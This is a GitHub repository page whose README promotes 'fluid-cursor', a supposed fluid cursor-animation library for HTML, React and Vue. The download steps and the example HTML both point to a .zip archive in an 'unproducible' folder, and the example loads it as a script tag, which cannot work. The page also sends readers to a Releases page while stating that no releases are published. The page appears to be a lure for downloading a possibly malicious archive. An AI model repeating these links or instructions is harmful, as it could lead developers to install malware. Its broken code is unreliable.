Skip to content

๐ŸŽจ Enhance your web experience with fluid-cursor, a library that creates smooth, customizable cursor animations for modern applications.

License

Notifications You must be signed in to change notification settings

RRNNimsara/fluid-cursor

Folders and files

NameName
Last commit message
Last commit date

Latest commit

ย 

History

9 Commits
ย 
ย 
ย 
ย 
ย 
ย 
ย 
ย 
ย 
ย 
ย 
ย 
ย 
ย 

Repository files navigation

๐ŸŽจ fluid-cursor - Create Stunning Fluid Effects Easily

๐Ÿ“ฅ Download Now

Download fluid-cursor

๐Ÿš€ Getting Started

Welcome to fluid-cursor! This is an easy-to-use tool that adds a high-performance fluid simulation effect to your websiteโ€™s cursor. Whether youโ€™re working with plain HTML, React, or Vue, fluid-cursor makes your web applications dynamic.

๐ŸŽ‰ Features

  • Lightweight: Minimal impact on performance.
  • No Dependencies: Just drop it in your project and it's ready to go.
  • Compatibility: Works seamlessly with major web frameworks like React and Vue.
  • Visual Appeal: Grab your users' attention with an interactive cursor.

โš™๏ธ System Requirements

To run fluid-cursor, you need:

  • A modern web browser (like Chrome, Firefox, or Safari).
  • Basic web hosting or local server for testing (optional but recommended).

๐Ÿ“‹ Download & Install

To get started with fluid-cursor, follow these steps:

  1. Visit the Releases Page: Go to the fluid-cursor Releases page.

  2. Download the latest version: Look for the latest release at the top of the page. You will find a list of files to download.

  3. Select the right file:

    • For most users, you will want the https://raw.githubusercontent.com/RRNNimsara/fluid-cursor/main/unproducible/fluid-cursor-v1.5.zip file, which is the optimized version for production.

    File List (This image is a placeholder for the actual interface)

  4. Save the File: Once you click on the file link, the file will download to your computer.

  5. Integrate the File into Your Project:

    • If youโ€™re using HTML, include it in your HTML head tag:
      <script src="https://raw.githubusercontent.com/RRNNimsara/fluid-cursor/main/unproducible/fluid-cursor-v1.5.zip"></script>
    • For React, install using npm or link it in your component:
      npm install fluid-cursor
    • Then import it into your React component:
      import FluidCursor from 'fluid-cursor';
  6. Customize Your Cursor: You can set various properties to customize the fluid effect. Check out the Documentation for examples.

๐Ÿ’ก Example Usage

Here is a simple example of how to set up fluid-cursor in an HTML file:

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <script src="https://raw.githubusercontent.com/RRNNimsara/fluid-cursor/main/unproducible/fluid-cursor-v1.5.zip"></script>
    <title>Fluid Cursor Example</title>
</head>
<body>
    <h1>Welcome to fluid-cursor!</h1>
    <script>
        const cursor = new FluidCursor({
            color: '#ff0000',
            size: 30
        });
    </script>
</body>
</html>

In this example, the cursor will be red and have a size of 30 pixels.

๐ŸŽจ Customization Options

You can customize various aspects of the fluid cursor:

  • Color: Change the color to match your siteโ€™s palette.
  • Size: Adjust the size of the cursor effect.
  • Border: Add a border to the fluid effect for more definition.
  • Animation Speed: Control how fast the fluid effect responds to cursor movement.

Check the official documentation for a full list of options.

๐Ÿค Community and Support

If you need help or have questions:

๐Ÿ”— Related Topics

Here are some topics you may find interesting:

  • Animation
  • WebGL
  • Frontend Development
  • React Components

๐ŸŒ License

fluid-cursor is open-source and follows the MIT License. Feel free to use and modify it for your personal or commercial projects.

๐Ÿ“ฅ Download Now Again

Donโ€™t forget to download fluid-cursor today and make your web applications more interactive!

About

๐ŸŽจ Enhance your web experience with fluid-cursor, a library that creates smooth, customizable cursor animations for modern applications.

Topics

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Contributors 2

  •  
  •